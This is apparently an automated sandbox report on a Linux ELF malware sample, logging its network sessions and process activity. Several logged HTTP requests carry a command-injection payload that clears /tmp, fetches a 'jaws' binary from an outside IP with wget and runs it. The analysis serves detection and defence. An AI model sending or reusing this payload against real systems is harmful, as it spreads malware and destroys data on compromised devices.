                                                            Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 26 23 39 31 3b 6e 6f 26 23 33 32 3b 55 52 4c 26 23 39 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 61 64 33 38 63 39 31 37 26 23 34 36 3b 31 37 30 36 32 37 39 35 38 31 26 23 34 36 3b 35 65 64 36 64 32 65 30 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                            Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "&#91;no&#32;URL&#93;", is invalid.<p>Reference&#32;&#35;9&#46;ad38c917&#46;1706279581&#46;5ed6d2e0</BODY></HTML>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            647192.168.2.236027623.47.10.2880
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:33:01.789274931 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:33:01.916971922 CET430INHTTP/1.0 400 Bad Request
                                                            Server: AkamaiGHost
                                                            Mime-Version: 1.0
                                                            Content-Type: text/html
                                                            Content-Length: 208
                                                            Expires: Fri, 26 Jan 2024 14:33:01 GMT
                                                            Date: Fri, 26 Jan 2024 14:33:01 GMT
                                                            Connection: close
                                                            Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 26 23 39 31 3b 6e 6f 26 23 33 32 3b 55 52 4c 26 23 39 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 34 66 30 66 64 30 31 37 26 23 34 36 3b 31 37 30 36 32 37 39 35 38 31 26 23 34 36 3b 35 36 36 39 36 66 65 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                            Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "&#91;no&#32;URL&#93;", is invalid.<p>Reference&#32;&#35;9&#46;4f0fd017&#46;1706279581&#46;56696fe</BODY></HTML>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            648192.168.2.234922023.63.87.4980
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:33:01.955923080 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:33:02.369379997 CET503INHTTP/1.1 503 Service Unavailable
                                                            Server: AkamaiGHost
                                                            Mime-Version: 1.0
                                                            Content-Type: text/html
                                                            Content-Length: 268
                                                            Expires: Fri, 26 Jan 2024 14:33:02 GMT
                                                            Date: Fri, 26 Jan 2024 14:33:02 GMT
                                                            Connection: keep-alive
                                                            Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 53 65 72 76 69 63 65 20 55 6e 61 76 61 69 6c 61 62 6c 65 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 53 65 72 76 69 63 65 20 55 6e 61 76 61 69 6c 61 62 6c 65 20 2d 20 44 4e 53 20 66 61 69 6c 75 72 65 3c 2f 48 31 3e 0a 54 68 65 20 73 65 72 76 65 72 20 69 73 20 74 65 6d 70 6f 72 61 72 69 6c 79 20 75 6e 61 62 6c 65 20 74 6f 20 73 65 72 76 69 63 65 20 79 6f 75 72 20 72 65 71 75 65 73 74 2e 20 20 50 6c 65 61 73 65 20 74 72 79 20 61 67 61 69 6e 0a 6c 61 74 65 72 2e 3c 50 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 31 31 26 23 34 36 3b 61 37 62 30 66 37 34 38 26 23 34 36 3b 31 37 30 36 32 37 39 35 38 32 26 23 34 36 3b 39 39 64 35 36 32 32 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                            Data Ascii: <HTML><HEAD><TITLE>Service Unavailable</TITLE></HEAD><BODY><H1>Service Unavailable - DNS failure</H1>The server is temporarily unable to service your request. Please try againlater.<P>Reference&#32;&#35;11&#46;a7b0f748&#46;1706279582&#46;99d5622</BODY></HTML>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            649192.168.2.2341094172.255.248.15080
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:33:01.959348917 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:33:02.161911964 CET345INHTTP/1.1 404 Not Found
                                                            Server: nginx
                                                            Date: Fri, 26 Jan 2024 14:33:02 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 162
                                                            Connection: keep-alive
                                                            Vary: Accept-Encoding
                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                            Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            650192.168.2.2352170116.202.54.2480
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:33:01.962315083 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:33:02.168864012 CET404INHTTP/1.1 400 Bad Request
                                                            Date: Fri, 26 Jan 2024 14:33:02 GMT
                                                            Server: Apache
                                                            Content-Length: 226
                                                            Connection: close
                                                            Content-Type: text/html; charset=iso-8859-1
                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p></body></html>


                                                            System Behavior

                                                            Start time (UTC):14:30:57
                                                            Start date (UTC):26/01/2024
                                                            Path:/tmp/Cm1FNv3k5V.elf
                                                            Arguments:/tmp/Cm1FNv3k5V.elf
                                                            File size:33004 bytes
                                                            MD5 hash:ac4d02757f1d3dbc1204528910484d76

                                                            Start time (UTC):14:30:57
                                                            Start date (UTC):26/01/2024
                                                            Path:/tmp/Cm1FNv3k5V.elf
                                                            Arguments:-
                                                            File size:33004 bytes
                                                            MD5 hash:ac4d02757f1d3dbc1204528910484d76

                                                            Start time (UTC):14:30:57
                                                            Start date (UTC):26/01/2024
                                                            Path:/tmp/Cm1FNv3k5V.elf
                                                            Arguments:-
                                                            File size:33004 bytes
                                                            MD5 hash:ac4d02757f1d3dbc1204528910484d76

                                                            Start time (UTC):14:30:57
                                                            Start date (UTC):26/01/2024
                                                            Path:/tmp/Cm1FNv3k5V.elf
                                                            Arguments:-
                                                            File size:33004 bytes
                                                            MD5 hash:ac4d02757f1d3dbc1204528910484d76
                                                            Start time (UTC):14:30:57
                                                            Start date (UTC):26/01/2024
                                                            Path:/tmp/Cm1FNv3k5V.elf
                                                            Arguments:-
                                                            File size:33004 bytes
                                                            MD5 hash:ac4d02757f1d3dbc1204528910484d76
                                                            Start time (UTC):14:30:57
                                                            Start date (UTC):26/01/2024
                                                            Path:/tmp/Cm1FNv3k5V.elf
                                                            Arguments:-
                                                            File size:33004 bytes
                                                            MD5 hash:ac4d02757f1d3dbc1204528910484d76
                                                            Start time (UTC):14:30:57
                                                            Start date (UTC):26/01/2024
                                                            Path:/tmp/Cm1FNv3k5V.elf
                                                            Arguments:-
                                                            File size:33004 bytes
                                                            MD5 hash:ac4d02757f1d3dbc1204528910484d76

                                                            Start time (UTC):14:31:03
                                                            Start date (UTC):26/01/2024
                                                            Path:/usr/bin/xfce4-panel
                                                            Arguments:-
                                                            File size:375768 bytes
                                                            MD5 hash:a15b657c7d54ac1385f1f15004ea6784

                                                            Start time (UTC):14:31:03
                                                            Start date (UTC):26/01/2024
                                                            Path:/usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0
                                                            Arguments:/usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 /usr/lib/x86_64-linux-gnu/xfce4/panel/plugins/libsystray.so 6 12582920 systray "Notification Area" "Area where notification icons appear"
                                                            File size:35136 bytes
                                                            MD5 hash:ac0b8a906f359a8ae102244738682e76

                                                            Start time (UTC):14:31:03
                                                            Start date (UTC):26/01/2024
                                                            Path:/usr/bin/xfce4-panel
                                                            Arguments:-
                                                            File size:375768 bytes
                                                            MD5 hash:a15b657c7d54ac1385f1f15004ea6784

                                                            Start time (UTC):14:31:03
                                                            Start date (UTC):26/01/2024
                                                            Path:/usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0
                                                            Arguments:/usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 /usr/lib/x86_64-linux-gnu/xfce4/panel/plugins/libstatusnotifier.so 7 12582921 statusnotifier "Status Notifier Plugin" "Provides a panel area for status notifier items (application indicators)"
                                                            File size:35136 bytes
                                                            MD5 hash:ac0b8a906f359a8ae102244738682e76

                                                            Start time (UTC):14:31:03
                                                            Start date (UTC):26/01/2024
                                                            Path:/usr/bin/xfce4-panel
                                                            Arguments:-
                                                            File size:375768 bytes
                                                            MD5 hash:a15b657c7d54ac1385f1f15004ea6784

                                                            Start time (UTC):14:31:03
                                                            Start date (UTC):26/01/2024
                                                            Path:/usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0
                                                            Arguments:/usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 /usr/lib/x86_64-linux-gnu/xfce4/panel/plugins/libpulseaudio-plugin.so 8 12582922 pulseaudio "PulseAudio Plugin" "Adjust the audio volume of the PulseAudio sound system"
                                                            File size:35136 bytes
                                                            MD5 hash:ac0b8a906f359a8ae102244738682e76

                                                            Start time (UTC):14:31:03
                                                            Start date (UTC):26/01/2024
                                                            Path:/usr/bin/xfce4-panel
                                                            Arguments:-
                                                            File size:375768 bytes
                                                            MD5 hash:a15b657c7d54ac1385f1f15004ea6784

                                                            Start time (UTC):14:31:03
                                                            Start date (UTC):26/01/2024
                                                            Path:/usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0
                                                            Arguments:/usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 /usr/lib/x86_64-linux-gnu/xfce4/panel/plugins/libxfce4powermanager.so 9 12582923 power-manager-plugin "Power Manager Plugin" "Display the battery levels of your devices and control the brightness of your display"
                                                            File size:35136 bytes
                                                            MD5 hash:ac0b8a906f359a8ae102244738682e76

                                                            Start time (UTC):14:31:03
                                                            Start date (UTC):26/01/2024
                                                            Path:/usr/bin/xfce4-panel
                                                            Arguments:-
                                                            File size:375768 bytes
                                                            MD5 hash:a15b657c7d54ac1385f1f15004ea6784

                                                            Start time (UTC):14:31:03
                                                            Start date (UTC):26/01/2024
                                                            Path:/usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0
                                                            Arguments:/usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 /usr/lib/x86_64-linux-gnu/xfce4/panel/plugins/libnotification-plugin.so 10 12582924 notification-plugin "Notification Plugin" "Notification plugin for the Xfce panel"
                                                            File size:35136 bytes
                                                            MD5 hash:ac0b8a906f359a8ae102244738682e76

                                                            Start time (UTC):14:31:03
                                                            Start date (UTC):26/01/2024
                                                            Path:/usr/bin/xfce4-panel
                                                            Arguments:-
                                                            File size:375768 bytes
                                                            MD5 hash:a15b657c7d54ac1385f1f15004ea6784

                                                            Start time (UTC):14:31:03
                                                            Start date (UTC):26/01/2024
                                                            Path:/usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0
                                                            Arguments:/usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 /usr/lib/x86_64-linux-gnu/xfce4/panel/plugins/libactions.so 14 12582925 actions "Action Buttons" "Log out, lock or other system actions"
                                                            File size:35136 bytes
                                                            MD5 hash:ac0b8a906f359a8ae102244738682e76

                                                            Start time (UTC):14:31:05
                                                            Start date (UTC):26/01/2024
                                                            Path:/usr/bin/dbus-daemon
                                                            Arguments:-
                                                            File size:249032 bytes
                                                            MD5 hash:3089d47e3f3ab84cd81c48fd406d7a8c

                                                            Start time (UTC):14:31:05
                                                            Start date (UTC):26/01/2024
                                                            Path:/usr/lib/x86_64-linux-gnu/xfce4/xfconf/xfconfd
                                                            Arguments:/usr/lib/x86_64-linux-gnu/xfce4/xfconf/xfconfd
                                                            File size:112880 bytes
                                                            MD5 hash:4c7a0d6d258bb970905b19b84abcd8e9